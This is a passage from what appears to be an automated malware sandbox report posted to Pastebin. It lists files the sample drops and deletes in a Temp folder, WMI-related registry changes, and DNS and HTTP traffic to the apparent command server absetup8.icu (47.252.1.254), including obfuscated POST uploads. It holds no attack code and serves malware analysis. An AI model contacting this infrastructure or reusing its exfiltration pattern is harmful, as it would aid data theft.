  739. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  740. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  741. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  742. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  743. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  744. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  745. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  746. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  747. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  748. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  749. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  750. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  751. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  752. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  753. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  754. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  755. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  756. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  757. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  758. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  759. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  760. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  761. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  762. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  763. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  764. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  765. "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
  766. "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
  767. "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
  768. "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
  769. "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
  770. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  771. "\\??\\WMIDataDevice",
  772. "\\??\\PIPE\\samr",
  773. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  774. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  775. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  776. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  777. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  778. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  779. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  780. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER"
  781.  
  782.  
  783. * Deleted Files:
  784. "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
  785. "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
  786. "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
  787. "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
  788. "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
  789. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  790. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  791. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  792. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  793. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  794. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  795. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  796. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  797. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  798. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  799. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  800. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  801. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  802. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  803. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  804. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  805. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  806. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  807. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  808. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  809. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  810. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  811. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  812. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  813. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  814. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  815. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  816. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  817. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  818. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  819. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  820. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  821. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  822. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  823. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  824. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  825. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  826. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  827. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  828. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  829. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  830. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  831. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  832. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  833. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  834. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  835. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  836. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  837. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  838. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
  839. "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
  840.  
  841.  
  842. * Modified Registry Keys:
  843. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  844. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  845. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
  846. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  847. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  848. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  849. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  850. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  851. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  852. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  853. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  854. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  855. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  856. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  857.  
  858.  
  859. * Deleted Registry Keys:
  860.  
  861. * DNS Communications:
  862.  
  863. "type": "A",
  864. "request": "absetup8.icu",
  865. "answers":
  866.  
  867. "data": "47.252.1.254",
  868. "type": "A"
  869.  
  870.  
  871.  
  872.  
  873.  
  874. * Domains:
  875.  
  876. "ip": "47.252.1.254",
  877. "domain": "absetup8.icu"
  878.  
  879.  
  880.  
  881. * Network Communication - ICMP:
  882.  
  883. * Network Communication - HTTP:
  884.  
  885. "count": 1,
  886. "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  887. "uri": "http://absetup8.icu/index.php",
  888. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  889. "method": "POST",
  890. "host": "absetup8.icu",
  891. "version": "1.1",
  892. "path": "/index.php",
  893. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
  894. "port": 80
  895.  
  896.  
  897. "count": 1,
  898. "body": "",
  899. "uri": "http://absetup8.icu/index.php",
  900. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  901. "method": "POST",
  902. "host": "absetup8.icu",
  903. "version": "1.1",
  904. "path": "/index.php",
  905. "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 66393\r\nCache-Control: no-cache\r\n\r\n",
  906. "port": 80
  907.  
  908.  
  909.  
  910. * Network Communication - SMTP:
  911.  
  912. * Network Communication - Hosts:
  913.  
  914. "country_name": "United States",
  915. "ip": "47.252.1.254",
  916. "inaddrarpa": "",
  917. "hostname": "absetup8.icu"
  918.  
  919.  
  920.  
  921. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!